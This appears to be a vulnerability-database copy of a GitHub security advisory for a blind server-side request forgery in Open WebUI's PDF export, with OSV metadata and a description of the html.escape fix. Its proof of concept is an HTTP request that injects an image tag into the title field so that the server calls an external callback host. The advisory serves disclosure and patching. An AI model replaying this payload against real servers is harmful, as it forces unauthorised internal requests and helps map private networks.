GHSA-F776-FP4W-266C
Vulnerability from github – Published: 2026-05-14 20:22 – Updated: 2026-05-19 15:59Summary
Blind server side request forgery (SSRF) via the PDF generate function. The finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.
Details
In the PDF export, user inputs are interpreted as HTML and embedded into the PDF. According to tests, scripts and some potentially dangerous tags (iFrame, Object, etc.) are blocked, preventing server-side content from being read through this vulnerability. However, an image tag can be used to force a server-side request (SSRF), as shown in the following below.
PoC
Start a chat and export the PDF:
Intercept the request and insert an <img> tag into the title:
POST /api/v1/utils/pdf HTTP/2
Host: domain.local
//Some headers removed
Content-Type: application/json
Content-Length: 541
Te: trailers
{"title":"<img src='https://d5jok0s7ghl1p77v5brlqlxwmnsega4z.oastify.com' />","messages":[{"id":"81f24589-384d-431c-a26c-5cd3382ac941","parentId":null,"childrenIds":["0c1a3ee1-6350-4bb4-b95e-fc2341c47e8e"],"role":"user","content":"hallo","timestamp":1736932102,"models":["gpt-4o-POC"]},{"parentId":"81f24589-384d-431c-a26c-5cd3382ac941","id":"0c1a3ee1-6350-4bb4-b95e-fc2341c47e8e","childrenIds":[],"role":"assistant","content":"Hallo! Wie kann ich Ihnen helfen?","model":"gpt-4o-POC","modelName":"gpt-4o-POC","modelIdx":0,"userContext":null,"timestamp":1736932103,"done":true}]}
A HTTPS callback was received at https://d5jok0s7ghl1p77v5brlqlxwmnsega4z.oastify.com.
Impact
A user can force server-side GET requests. During the available testing time, no method was found to read the responses (Blind SSRF). Nonetheless, this should be prevented, as an attacker could enumerate internal assets through response delays and trigger arbitrary GET requests.
Resolution
Fixed in commit 167c8bf00, first released in v0.5.11 (2025-02). The fix wraps every user-controllable field that flows into the PDF HTML template (title, content, role, model, formatted date) in html.escape() before the template f-string is fed to fpdf2.write_html(). The PoC payload <img src='...' /> is escaped to <img src='...' /> and rendered as literal text by fpdf2, with no HTML parsing and no outbound request. Users on >= 0.5.11 are not affected.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "open-webui"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.11"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45347"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-14T20:22:02Z",
"nvd_published_at": "2026-05-15T22:16:55Z",
"severity": "MODERATE"
},
"details": "### Summary\nBlind server side request forgery (SSRF) via the PDF generate function. \nThe finding resulted from a penetration test for a customer. It is suspected that the root cause of the issue lies within the core of Open WebUI, which is why it is being reported as a security issue here. Tested on Open WebUI 0.5.4.\n\n### Details\nIn the PDF export, user inputs are interpreted as HTML and embedded into the PDF. According to tests, scripts and some potentially dangerous tags (iFrame, Object, etc.) are blocked, preventing server-side content from being read through this vulnerability. However, an image tag can be used to force a server-side request (SSRF), as shown in the following below.\n\n### PoC\nStart a chat and export the PDF:\n\n\nIntercept the request and insert an `\u003cimg\u003e` tag into the `title`:\n```http\nPOST /api/v1/utils/pdf HTTP/2\nHost: domain.local\n//Some headers removed\nContent-Type: application/json\nContent-Length: 541\nTe: trailers\n\n{\"title\":\"\u003cimg src=\u0027https://d5jok0s7ghl1p77v5brlqlxwmnsega4z.oastify.com\u0027 /\u003e\",\"messages\":[{\"id\":\"81f24589-384d-431c-a26c-5cd3382ac941\",\"parentId\":null,\"childrenIds\":[\"0c1a3ee1-6350-4bb4-b95e-fc2341c47e8e\"],\"role\":\"user\",\"content\":\"hallo\",\"timestamp\":1736932102,\"models\":[\"gpt-4o-POC\"]},{\"parentId\":\"81f24589-384d-431c-a26c-5cd3382ac941\",\"id\":\"0c1a3ee1-6350-4bb4-b95e-fc2341c47e8e\",\"childrenIds\":[],\"role\":\"assistant\",\"content\":\"Hallo! Wie kann ich Ihnen helfen?\",\"model\":\"gpt-4o-POC\",\"modelName\":\"gpt-4o-POC\",\"modelIdx\":0,\"userContext\":null,\"timestamp\":1736932103,\"done\":true}]}\n```\n\nA HTTPS callback was received at https://d5jok0s7ghl1p77v5brlqlxwmnsega4z.oastify.com.\n\n### Impact\nA user can force server-side GET requests. During the available testing time, no method was found to read the responses (Blind SSRF). Nonetheless, this should be prevented, as an attacker could enumerate internal assets through response delays and trigger arbitrary GET requests.\n\n## Resolution\n\nFixed in commit [167c8bf00](https://github.com/open-webui/open-webui/commit/167c8bf00d165af523acfc3b870749f6be6d3e57), first released in **v0.5.11** (2025-02). The fix wraps every user-controllable field that flows into the PDF HTML template (`title`, `content`, `role`, `model`, formatted date) in `html.escape()` before the template f-string is fed to `fpdf2.write_html()`. The PoC payload `\u003cimg src=\u0027...\u0027 /\u003e` is escaped to `\u0026lt;img src=\u0026#x27;...\u0026#x27; /\u0026gt;` and rendered as literal text by fpdf2, with no HTML parsing and no outbound request. Users on `\u003e= 0.5.11` are not affected.",
"id": "GHSA-f776-fp4w-266c",
"modified": "2026-05-19T15:59:48Z",
"published": "2026-05-14T20:22:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-f776-fp4w-266c"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45347"
},
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/commit/167c8bf00d165af523acfc3b870749f6be6d3e57"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
},
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/releases/tag/v0.5.11"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI vulnerable to blind server side request forgery (SSRF) via the PDF generate function"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.